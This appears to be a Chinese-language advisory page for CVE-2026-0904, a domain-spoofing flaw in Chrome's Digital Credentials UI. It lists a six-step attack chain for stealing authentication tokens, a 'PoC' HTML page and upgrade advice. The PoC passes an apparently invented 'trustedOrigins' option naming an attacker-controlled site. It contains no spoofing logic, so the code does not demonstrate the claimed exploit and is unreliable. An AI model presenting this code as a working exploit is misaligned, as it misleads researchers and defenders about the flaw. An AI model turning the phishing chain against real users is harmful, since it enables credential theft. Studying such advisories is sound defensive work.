CVE-2026-0904 Google Chrome数字凭证安全UI域名欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-0904

漏洞类型

安全UI欺骗/域名欺骗

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2026-0904是Google Chrome浏览器中数字凭证（Digital Credentials）功能的安全UI漏洞。该漏洞存在于Chrome 144.0.7559.59之前的版本中，由于数字凭证处理流程中的安全用户界面实现不正确，远程攻击者可以通过精心构造的恶意HTML页面实施域名欺骗攻击。攻击者利用此漏洞能够伪造可信的域名信息，诱导用户在看似合法的界面中输入敏感凭证数据。由于数字凭证通常涉及用户身份认证和敏感信息交换，此类UI欺骗攻击可能导致用户隐私数据泄露、身份冒充或进一步的钓鱼攻击。漏洞的CVSS评分为5.4，属于中等严重程度，主要因为攻击需要用户交互且不影响系统可用性。

技术细节

该漏洞属于浏览器安全UI欺骗类问题。在Google Chrome的数字凭证功能中，系统需要向用户展示请求凭证的来源域名信息，以便用户判断是否为可信请求。然而，在144.0.7559.59之前的版本中，安全UI组件未能正确验证和显示域名信息。攻击者可以通过以下方式利用：1）构造包含恶意iframe或弹出窗口的HTML页面；2）利用浏览器的同源策略漏洞或UI混淆技术，使伪造的凭证请求界面看起来来自可信域名；3）诱导用户在不知情的情况下授权凭证请求。由于数字凭证API通常用于OIDC等认证流程，攻击成功可获取用户的认证令牌或凭证数据。攻击的核心在于浏览器未能向用户传递准确的域名来源信息，导致用户无法做出正确的安全决策。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意网站，托管包含CVE-2026-0904利用代码的HTML页面

STEP 2

步骤2

受害者访问恶意网站，浏览器加载伪造的数字凭证请求界面

STEP 3

步骤3

利用安全UI漏洞，攻击者使凭证请求界面显示为可信域名（如银行或邮箱）

STEP 4

步骤4

受害者在欺骗性UI中误以为请求来自合法网站，点击授权

STEP 5

步骤5

攻击者获取受害者的数字凭证数据（认证令牌或身份信息）

STEP 6

步骤6

攻击者利用获取的凭证冒充受害者身份进行后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-0904 PoC: Domain Spoofing via Digital Credentials UI -->
<!DOCTYPE html>
<html>
<head>
    <title>Digital Credentials Spoofing PoC</title>
</head>
<body>
    <h1>CVE-2026-0904 Domain Spoofing PoC</h1>
    <button id='requestBtn'>Request Digital Credential</button>
    <pre id='output'></pre>

    <script>
        // PoC demonstrates the UI spoofing vulnerability
        // Attacker can forge the domain display in credential request
        document.getElementById('requestBtn').onclick = async function() {
            try {
                // Attempt to request digital credential
                // In vulnerable versions, attacker could spoof the UI
                const credential = await navigator.credentials.get({
                    digital: {
                        // Malicious configuration that exploits UI flaw
                        trustedOrigins: ['https://attacker-controlled-site.com'],
                        protocol: 'openid-connect'
                    }
                });
                document.getElementById('output').textContent = 
                    'Credential obtained: ' + JSON.stringify(credential);
            } catch (e) {
                document.getElementById('output').textContent = 
                    'Error: ' + e.message;
            }
        };
    </script>
</body>
</html>

影响范围

Google Chrome < 144.0.7559.59

防御指南

临时缓解措施

目前最有效的缓解措施是立即升级Google Chrome至144.0.7559.59或更高版本。用户应确保浏览器自动更新功能已启用，或手动检查更新（访问chrome://settings/help）。在升级前，用户应提高警惕，避免在不可信的网站页面中响应任何凭证请求弹窗，特别是那些要求输入用户名、密码或OTP的页面。如必须使用数字凭证功能，建议仅在确认URL完全正确的情况下授权请求。